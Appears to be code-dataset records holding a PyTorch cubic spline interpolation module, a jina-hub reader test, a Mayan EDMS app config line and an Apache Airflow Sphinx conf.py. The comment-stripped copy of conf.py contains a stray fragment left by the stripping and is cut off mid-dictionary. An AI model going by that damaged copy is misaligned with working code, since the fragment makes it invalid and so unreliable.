|
py
|
Python
|
loss/robust_loss_pytorch/robust_loss_pytorch/cubic_spline.py
|
milesgray/CALAE
|
a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac
|
[
"Apache-2.0"
] | 522
|
2019-05-15T23:09:14.000Z
|
2022-03-19T14:17:22.000Z
|
robust_loss_pytorch/cubic_spline.py
|
durandtibo/robust_loss_pytorch
|
911378b855f567e942336ae609cb8edb52e55228
|
[
"Apache-2.0"
] | 31
|
2019-06-03T10:55:22.000Z
|
2022-03-24T21:58:46.000Z
|
robust_loss_pytorch/cubic_spline.py
|
durandtibo/robust_loss_pytorch
|
911378b855f567e942336ae609cb8edb52e55228
|
[
"Apache-2.0"
] | 80
|
2019-05-29T14:21:49.000Z
|
2022-01-11T07:52:50.000Z
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements 1D cubic Hermite spline interpolation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
def interpolate1d(x, values, tangents):
r"""Perform cubic hermite spline interpolation on a 1D spline.
The x coordinates of the spline knots are at [0 : 1 : len(values)-1].
Queries outside of the range of the spline are computed using linear
extrapolation. See https://en.wikipedia.org/wiki/Cubic_Hermite_spline
for details, where "x" corresponds to `x`, "p" corresponds to `values`, and
"m" corresponds to `tangents`.
Args:
x: A tensor of any size of single or double precision floats containing the
set of values to be used for interpolation into the spline.
values: A vector of single or double precision floats containing the value
of each knot of the spline being interpolated into. Must be the same
length as `tangents` and the same type as `x`.
tangents: A vector of single or double precision floats containing the
tangent (derivative) of each knot of the spline being interpolated into.
Must be the same length as `values` and the same type as `x`.
Returns:
The result of interpolating along the spline defined by `values`, and
`tangents`, using `x` as the query values. Will be the same length and type
as `x`.
"""
# if x.dtype == 'float64' or torch.as_tensor(x).dtype == torch.float64:
# float_dtype = torch.float64
# else:
# float_dtype = torch.float32
# x = torch.as_tensor(x, dtype=float_dtype)
# values = torch.as_tensor(values, dtype=float_dtype)
# tangents = torch.as_tensor(tangents, dtype=float_dtype)
assert torch.is_tensor(x)
assert torch.is_tensor(values)
assert torch.is_tensor(tangents)
float_dtype = x.dtype
assert values.dtype == float_dtype
assert tangents.dtype == float_dtype
assert len(values.shape) == 1
assert len(tangents.shape) == 1
assert values.shape[0] == tangents.shape[0]
x_lo = torch.floor(torch.clamp(x, torch.as_tensor(0),
values.shape[0] - 2)).type(torch.int64)
x_hi = x_lo + 1
# Compute the relative distance between each `x` and the knot below it.
t = x - x_lo.type(float_dtype)
# Compute the cubic hermite expansion of `t`.
t_sq = t**2
t_cu = t * t_sq
h01 = -2. * t_cu + 3. * t_sq
h00 = 1. - h01
h11 = t_cu - t_sq
h10 = h11 - t_sq + t
# Linearly extrapolate above and below the extents of the spline for all
# values.
value_before = tangents[0] * t + values[0]
value_after = tangents[-1] * (t - 1.) + values[-1]
# Cubically interpolate between the knots below and above each query point.
neighbor_values_lo = values[x_lo]
neighbor_values_hi = values[x_hi]
neighbor_tangents_lo = tangents[x_lo]
neighbor_tangents_hi = tangents[x_hi]
value_mid = (
neighbor_values_lo * h00 + neighbor_values_hi * h01 +
neighbor_tangents_lo * h10 + neighbor_tangents_hi * h11)
# Return the interpolated or extrapolated values for each query point,
# depending on whether or not the query lies within the span of the spline.
return torch.where(t < 0., value_before,
torch.where(t > 1., value_after, value_mid))
| 39.346939
| 79
| 0.713174
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
def interpolate1d(x, values, tangents):
assert torch.is_tensor(x)
assert torch.is_tensor(values)
assert torch.is_tensor(tangents)
float_dtype = x.dtype
assert values.dtype == float_dtype
assert tangents.dtype == float_dtype
assert len(values.shape) == 1
assert len(tangents.shape) == 1
assert values.shape[0] == tangents.shape[0]
x_lo = torch.floor(torch.clamp(x, torch.as_tensor(0),
values.shape[0] - 2)).type(torch.int64)
x_hi = x_lo + 1
t = x - x_lo.type(float_dtype)
t_sq = t**2
t_cu = t * t_sq
h01 = -2. * t_cu + 3. * t_sq
h00 = 1. - h01
h11 = t_cu - t_sq
h10 = h11 - t_sq + t
value_before = tangents[0] * t + values[0]
value_after = tangents[-1] * (t - 1.) + values[-1]
neighbor_values_lo = values[x_lo]
neighbor_values_hi = values[x_hi]
neighbor_tangents_lo = tangents[x_lo]
neighbor_tangents_hi = tangents[x_hi]
value_mid = (
neighbor_values_lo * h00 + neighbor_values_hi * h01 +
neighbor_tangents_lo * h10 + neighbor_tangents_hi * h11)
return torch.where(t < 0., value_before,
torch.where(t > 1., value_after, value_mid))
| true
| true
|
790c8c1d71d3b4e18a00157853ed455148a3968d
| 519
|
py
|
Python
|
crafters/numeric/ArrayStringReader/tests/test_arraystringreader.py
|
carlosb1/jina-hub
|
f298d0f136c8627dd720d7a4e3eb9031655f5ccb
|
[
"Apache-2.0"
] | 1
|
2022-03-01T12:43:17.000Z
|
2022-03-01T12:43:17.000Z
|
crafters/numeric/ArrayStringReader/tests/test_arraystringreader.py
|
carlosb1/jina-hub
|
f298d0f136c8627dd720d7a4e3eb9031655f5ccb
|
[
"Apache-2.0"
] | null | null | null |
crafters/numeric/ArrayStringReader/tests/test_arraystringreader.py
|
carlosb1/jina-hub
|
f298d0f136c8627dd720d7a4e3eb9031655f5ccb
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from .. import ArrayStringReader
def test_arraystringreader():
"""here is my test code
https://docs.pytest.org/en/stable/getting-started.html#create-your-first-test
"""
size = 8
sample_array = np.random.rand(size).astype('float32')
text = ','.join([str(x) for x in sample_array])
reader = ArrayStringReader()
crafted_doc = reader.craft(text, 0)
assert crafted_doc['blob'].shape[0] == size
np.testing.assert_array_equal(crafted_doc['blob'], sample_array)
| 25.95
| 81
| 0.687861
|
import numpy as np
from .. import ArrayStringReader
def test_arraystringreader():
size = 8
sample_array = np.random.rand(size).astype('float32')
text = ','.join([str(x) for x in sample_array])
reader = ArrayStringReader()
crafted_doc = reader.craft(text, 0)
assert crafted_doc['blob'].shape[0] == size
np.testing.assert_array_equal(crafted_doc['blob'], sample_array)
| true
| true
|
790c8ccc9ff42ab78d01890aefd7ce0b436f416c
| 109
|
py
|
Python
|
mayan/apps/dependencies/__init__.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2021-06-17T18:24:25.000Z
|
2021-06-17T18:24:25.000Z
|
mayan/apps/dependencies/__init__.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 7
|
2020-06-06T00:01:04.000Z
|
2022-01-13T01:47:17.000Z
|
mayan/apps/dependencies/__init__.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2020-07-29T21:03:27.000Z
|
2020-07-29T21:03:27.000Z
|
from __future__ import unicode_literals
default_app_config = 'mayan.apps.dependencies.apps.DependenciesApp'
| 27.25
| 67
| 0.862385
|
from __future__ import unicode_literals
default_app_config = 'mayan.apps.dependencies.apps.DependenciesApp'
| true
| true
|
790c8cd6cde18e829123f7a660cbb5a6be0b5d99
| 16,078
|
py
|
Python
|
docs/conf.py
|
vlive1111/airflow
|
7825e8f59034645ab3247229be83a3aa90baece1
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
vlive1111/airflow
|
7825e8f59034645ab3247229be83a3aa90baece1
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
vlive1111/airflow
|
7825e8f59034645ab3247229be83a3aa90baece1
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
# Disable Flake8 because of all the sphinx imports
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Airflow documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 9 20:50:01 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
"""Configuration of Airflow Docs"""
import os
import sys
from glob import glob
from typing import List
import airflow
from airflow.configuration import default_config_yaml
try:
import sphinx_airflow_theme # pylint: disable=unused-import
airflow_theme_is_available = True
except ImportError:
airflow_theme_is_available = False
# Hack to allow changing for piece of the code to behave differently while
# the docs are being built. The main objective was to alter the
# behavior of the utils.apply_default that was hiding function headers
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
# == Sphinx configuration ======================================================
# -- Project information -------------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
# General information about the project.
project = 'Airflow'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# -- General configuration -----------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'provider_init_hack',
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.graphviz',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinxcontrib.jinja',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles',
'removemarktransform',
'sphinx_copybutton',
'redirects',
'providers_packages_ref',
# First, generate redoc
'sphinxcontrib.redoc',
# Second, update redoc script
"sphinx_script_update",
"sphinxcontrib.spelling",
]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns: List[str] = [
# We only link to selected subpackages.
'_api/airflow/index.rst',
# We have custom page - operators-and-hooks-ref.rst
'_api/airflow/providers/index.rst',
# Packages with subpackages
"_api/airflow/providers/microsoft/index.rst",
"_api/airflow/providers/apache/index.rst",
"_api/airflow/providers/cncf/index.rst",
# Templates or partials
'autoapi_templates',
'howto/operator/google/_partials',
'howto/operator/microsoft/_partials',
]
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def _get_rst_filepath_from_path(filepath: str):
if os.path.isdir(filepath):
result = filepath
elif os.path.isfile(filepath) and filepath.endswith('/__init__.py'):
result = filepath.rpartition("/")[0]
else:
result = filepath.rpartition(".")[0]
result += "/index.rst"
result = f"_api/{os.path.relpath(result, ROOT_DIR)}"
return result
# Exclude top-level packages
# do not exclude these top-level modules from the doc build:
_allowed_top_level = ("exceptions.py",)
for path in glob(f"{ROOT_DIR}/airflow/*"):
name = os.path.basename(path)
if os.path.isfile(path) and not path.endswith(_allowed_top_level):
exclude_patterns.append(f"_api/airflow/{name.rpartition('.')[0]}")
browsable_packages = ["operators", "hooks", "sensors", "providers", "executors", "models", "secrets"]
if os.path.isdir(path) and name not in browsable_packages:
exclude_patterns.append(f"_api/airflow/{name}")
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
# -- Options for HTML output ---------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
if airflow_theme_is_available:
html_theme = 'sphinx_airflow_theme'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# given, this must be the name of an image file (path relative to the
# configuration directory) that is the favicon of the docs. Modern browsers
# use this as the icon for tabs, windows and bookmarks. It should be a
# Windows-style icon file (.ico), which is 16x16 or 32x32 pixels large.
html_favicon = "../airflow/www/static/pin_32.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# A list of JavaScript filename. The entry must be a filename string or a
# tuple containing the filename string and the attributes dictionary. The
# filename must be relative to the html_static_path, or a full URI with
# scheme like http://example.org/script.js.
html_js_files = ['jira-links.js']
# Custom sidebar templates, maps document names to template names.
if airflow_theme_is_available:
html_sidebars = {
'**': [
'version-selector.html',
'searchbox.html',
'globaltoc.html',
]
}
# If false, no index is generated.
html_use_index = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# A dictionary of values to pass into the template engine’s context for all pages.
html_context = {
# Google Analytics ID.
# For more information look at:
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/layout.html#L222-L232
'theme_analytics_id': 'UA-140539454-1',
}
if airflow_theme_is_available:
html_context = {
# Variables used to build a button for editing the source code
#
# The path is created according to the following template:
#
# https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/
# {{ theme_vcs_pageview_mode|default("blob") }}/{{ github_version }}{{ conf_py_path }}
# {{ pagename }}{{ suffix }}
#
# More information:
# https://github.com/readthedocs/readthedocs.org/blob/master/readthedocs/doc_builder/templates/doc_builder/conf.py.tmpl#L100-L103
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/breadcrumbs.html#L45
# https://github.com/apache/airflow-site/blob/91f760c/sphinx_airflow_theme/sphinx_airflow_theme/suggest_change_button.html#L36-L40
#
'theme_vcs_pageview_mode': 'edit',
'conf_py_path': '/docs/',
'github_user': 'apache',
'github_repo': 'airflow',
'github_version': 'master',
'display_github': 'master',
'suffix': '.rst',
}
# == Extensions configuration ==================================================
# -- Options for sphinxcontrib.jinjac ------------------------------------------
# See: https://github.com/tardyp/sphinx-jinja
# Jinja context
jinja_contexts = {'config_ctx': {"configs": default_config_yaml()}}
# -- Options for sphinx.ext.autodoc --------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/autodoc.html
# This value contains a list of modules to be mocked up. This is useful when some external dependencies
# are not met at build time and break the building process.
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.kusto',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
'pyhive',
'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
'vertica_python',
'winrm',
'zdesk',
]
# The default options for autodoc directives. They are applied to all autodoc directives automatically.
autodoc_default_options = {'show-inheritance': True, 'members': True}
# -- Options for sphinx.ext.intersphinx ----------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html
# This config value contains the locations and names of other projects that should
# be linked to in this documentation.
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'celery': ('https://docs.celeryproject.org/en/stable/', None),
'hdfs': ('https://hdfscli.readthedocs.io/en/latest/', None),
'jinja2': ('https://jinja.palletsprojects.com/en/master/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('https://requests.readthedocs.io/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
# google-api
'google-api-core': ('https://googleapis.dev/python/google-api-core/latest', None),
'google-cloud-automl': ('https://googleapis.dev/python/automl/latest', None),
'google-cloud-bigquery': ('https://googleapis.dev/python/bigquery/latest', None),
'google-cloud-bigquery-datatransfer': ('https://googleapis.dev/python/bigquerydatatransfer/latest', None),
'google-cloud-bigquery-storage': ('https://googleapis.dev/python/bigquerystorage/latest', None),
'google-cloud-bigtable': ('https://googleapis.dev/python/bigtable/latest', None),
'google-cloud-container': ('https://googleapis.dev/python/container/latest', None),
'google-cloud-core': ('https://googleapis.dev/python/google-cloud-core/latest', None),
'google-cloud-datacatalog': ('https://googleapis.dev/python/datacatalog/latest', None),
'google-cloud-datastore': ('https://googleapis.dev/python/datastore/latest', None),
'google-cloud-dlp': ('https://googleapis.dev/python/dlp/latest', None),
'google-cloud-kms': ('https://googleapis.dev/python/cloudkms/latest', None),
'google-cloud-language': ('https://googleapis.dev/python/language/latest', None),
'google-cloud-monitoring': ('https://googleapis.dev/python/monitoring/latest', None),
'google-cloud-pubsub': ('https://googleapis.dev/python/pubsub/latest', None),
'google-cloud-redis': ('https://googleapis.dev/python/redis/latest', None),
'google-cloud-spanner': ('https://googleapis.dev/python/spanner/latest', None),
'google-cloud-speech': ('https://googleapis.dev/python/speech/latest', None),
'google-cloud-storage': ('https://googleapis.dev/python/storage/latest', None),
'google-cloud-tasks': ('https://googleapis.dev/python/cloudtasks/latest', None),
'google-cloud-texttospeech': ('https://googleapis.dev/python/texttospeech/latest', None),
'google-cloud-translate': ('https://googleapis.dev/python/translation/latest', None),
'google-cloud-videointelligence': ('https://googleapis.dev/python/videointelligence/latest', None),
'google-cloud-vision': ('https://googleapis.dev/python/vision/latest', None),
}
# -- Options for sphinx.ext.viewcode -------------------------------------------
# See: https://www.sphinx-doc.org/es/master/usage/extensions/viewcode.html
# If this is True, viewcode extension will emit viewcode-follow-imported event to resolve the name of
# the module by other extensions. The default is True.
viewcode_follow_imported_members = True
# -- Options for sphinx-autoapi ------------------------------------------------
# See: https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
'*/airflow/kubernetes/kubernetes_request_factory/*',
'*/_internal*',
'*/airflow/**/providers/**/utils/*',
'*/node_modules/*',
'*/example_dags/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = True
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for ext.exampleinclude --------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
# -- Options for ext.redirects -------------------------------------------------
redirects_file = 'redirects.txt'
# -- Options for sphinxcontrib.redoc -------------------------------------------
# See: https://sphinxcontrib-redoc.readthedocs.io/en/stable/
OPENAPI_FILE = os.path.join(os.path.dirname(__file__), "..", "airflow", "api_connexion", "openapi", "v1.yaml")
redoc = [
{
'name': 'Airflow REST API',
'page': 'stable-rest-api-ref',
'spec': OPENAPI_FILE,
'opts': {
'hide-hostname': True,
'no-auto-auth': True,
},
},
]
# Options for script updater
redoc_script_url = "https://cdn.jsdelivr.net/npm/redoc@2.0.0-rc.30/bundles/redoc.standalone.js"
| 38.009456
| 138
| 0.678505
|
import os
import sys
from glob import glob
from typing import List
import airflow
from airflow.configuration import default_config_yaml
try:
import sphinx_airflow_theme
airflow_theme_is_available = True
except ImportError:
airflow_theme_is_available = False
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
w'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# -- General configuration -----------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'provider_init_hack',
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.graphviz',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinxcontrib.jinja',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles',
'removemarktransform',
'sphinx_copybutton',
'redirects',
'providers_packages_ref',
# First, generate redoc
'sphinxcontrib.redoc',
# Second, update redoc script
"sphinx_script_update",
"sphinxcontrib.spelling",
]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns: List[str] = [
# We only link to selected subpackages.
'_api/airflow/index.rst',
# We have custom page - operators-and-hooks-ref.rst
'_api/airflow/providers/index.rst',
# Packages with subpackages
"_api/airflow/providers/microsoft/index.rst",
"_api/airflow/providers/apache/index.rst",
"_api/airflow/providers/cncf/index.rst",
# Templates or partials
'autoapi_templates',
'howto/operator/google/_partials',
'howto/operator/microsoft/_partials',
]
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def _get_rst_filepath_from_path(filepath: str):
    """Map a source path to its AutoAPI-generated ``index.rst`` path.

    Directories map to themselves, package ``__init__.py`` files map to
    their containing package directory, and ordinary modules map to the
    module name without its extension.  The result is expressed relative
    to ``ROOT_DIR`` under the ``_api/`` documentation tree.
    """
    if os.path.isdir(filepath):
        base = filepath
    elif os.path.isfile(filepath) and filepath.endswith('/__init__.py'):
        # A package: document the directory, not the __init__ module itself.
        base = filepath.rpartition("/")[0]
    else:
        # A plain module: strip the file extension.
        base = filepath.rpartition(".")[0]
    rst_path = f"{base}/index.rst"
    return f"_api/{os.path.relpath(rst_path, ROOT_DIR)}"
# Exclude top-level packages
# do not exclude these top-level modules from the doc build:
_allowed_top_level = ("exceptions.py",)
# Top-level sub-packages that should remain browsable in the generated docs;
# every other entry directly under airflow/ gets excluded below.
# (Hoisted out of the loop: the original rebuilt this list on every iteration.)
browsable_packages = ["operators", "hooks", "sensors", "providers", "executors", "models", "secrets"]
for path in glob(f"{ROOT_DIR}/airflow/*"):
    name = os.path.basename(path)
    # Exclude top-level modules (files) except the explicitly allowed ones.
    if os.path.isfile(path) and not path.endswith(_allowed_top_level):
        exclude_patterns.append(f"_api/airflow/{name.rpartition('.')[0]}")
    # Exclude top-level directories that are not meant to be browsed.
    if os.path.isdir(path) and name not in browsable_packages:
        exclude_patterns.append(f"_api/airflow/{name}")
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
# -- Options for HTML output ---------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
if airflow_theme_is_available:
html_theme = 'sphinx_airflow_theme'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# given, this must be the name of an image file (path relative to the
# configuration directory) that is the favicon of the docs. Modern browsers
# use this as the icon for tabs, windows and bookmarks. It should be a
# Windows-style icon file (.ico), which is 16x16 or 32x32 pixels large.
html_favicon = "../airflow/www/static/pin_32.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# A list of JavaScript filename. The entry must be a filename string or a
# tuple containing the filename string and the attributes dictionary. The
# filename must be relative to the html_static_path, or a full URI with
# scheme like http://example.org/script.js.
html_js_files = ['jira-links.js']
# Custom sidebar templates, maps document names to template names.
if airflow_theme_is_available:
html_sidebars = {
'**': [
'version-selector.html',
'searchbox.html',
'globaltoc.html',
]
}
# If false, no index is generated.
html_use_index = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# A dictionary of values to pass into the template engine’s context for all pages.
html_context = {
# Google Analytics ID.
# For more information look at:
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/layout.html#L222-L232
'theme_analytics_id': 'UA-140539454-1',
}
if airflow_theme_is_available:
html_context = {
# Variables used to build a button for editing the source code
#
# The path is created according to the following template:
#
# https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/
# {{ theme_vcs_pageview_mode|default("blob") }}/{{ github_version }}{{ conf_py_path }}
# {{ pagename }}{{ suffix }}
#
# More information:
# https://github.com/readthedocs/readthedocs.org/blob/master/readthedocs/doc_builder/templates/doc_builder/conf.py.tmpl#L100-L103
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/breadcrumbs.html#L45
# https://github.com/apache/airflow-site/blob/91f760c/sphinx_airflow_theme/sphinx_airflow_theme/suggest_change_button.html#L36-L40
#
'theme_vcs_pageview_mode': 'edit',
'conf_py_path': '/docs/',
'github_user': 'apache',
'github_repo': 'airflow',
'github_version': 'master',
'display_github': 'master',
'suffix': '.rst',
}
# == Extensions configuration ==================================================
# -- Options for sphinxcontrib.jinjac ------------------------------------------
# See: https://github.com/tardyp/sphinx-jinja
# Jinja context
jinja_contexts = {'config_ctx': {"configs": default_config_yaml()}}
# -- Options for sphinx.ext.autodoc --------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/autodoc.html
# This value contains a list of modules to be mocked up. This is useful when some external dependencies
# are not met at build time and break the building process.
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.kusto',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
'pyhive',
'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
'vertica_python',
'winrm',
'zdesk',
]
# The default options for autodoc directives. They are applied to all autodoc directives automatically.
autodoc_default_options = {'show-inheritance': True, 'members': True}
# -- Options for sphinx.ext.intersphinx ----------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html
# This config value contains the locations and names of other projects that should
# be linked to in this documentation.
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'celery': ('https://docs.celeryproject.org/en/stable/', None),
'hdfs': ('https://hdfscli.readthedocs.io/en/latest/', None),
'jinja2': ('https://jinja.palletsprojects.com/en/master/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('https://requests.readthedocs.io/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
# google-api
'google-api-core': ('https://googleapis.dev/python/google-api-core/latest', None),
'google-cloud-automl': ('https://googleapis.dev/python/automl/latest', None),
'google-cloud-bigquery': ('https://googleapis.dev/python/bigquery/latest', None),
'google-cloud-bigquery-datatransfer': ('https://googleapis.dev/python/bigquerydatatransfer/latest', None),
'google-cloud-bigquery-storage': ('https://googleapis.dev/python/bigquerystorage/latest', None),
'google-cloud-bigtable': ('https://googleapis.dev/python/bigtable/latest', None),
'google-cloud-container': ('https://googleapis.dev/python/container/latest', None),
'google-cloud-core': ('https://googleapis.dev/python/google-cloud-core/latest', None),
'google-cloud-datacatalog': ('https://googleapis.dev/python/datacatalog/latest', None),
'google-cloud-datastore': ('https://googleapis.dev/python/datastore/latest', None),
'google-cloud-dlp': ('https://googleapis.dev/python/dlp/latest', None),
'google-cloud-kms': ('https://googleapis.dev/python/cloudkms/latest', None),
'google-cloud-language': ('https://googleapis.dev/python/language/latest', None),
'google-cloud-monitoring': ('https://googleapis.dev/python/monitoring/latest', None),
'google-cloud-pubsub': ('https://googleapis.dev/python/pubsub/latest', None),
'google-cloud-redis': ('https://googleapis.dev/python/redis/latest', None),
'google-cloud-spanner': ('https://googleapis.dev/python/spanner/latest', None),
'google-cloud-speech': ('https://googleapis.dev/python/speech/latest', None),
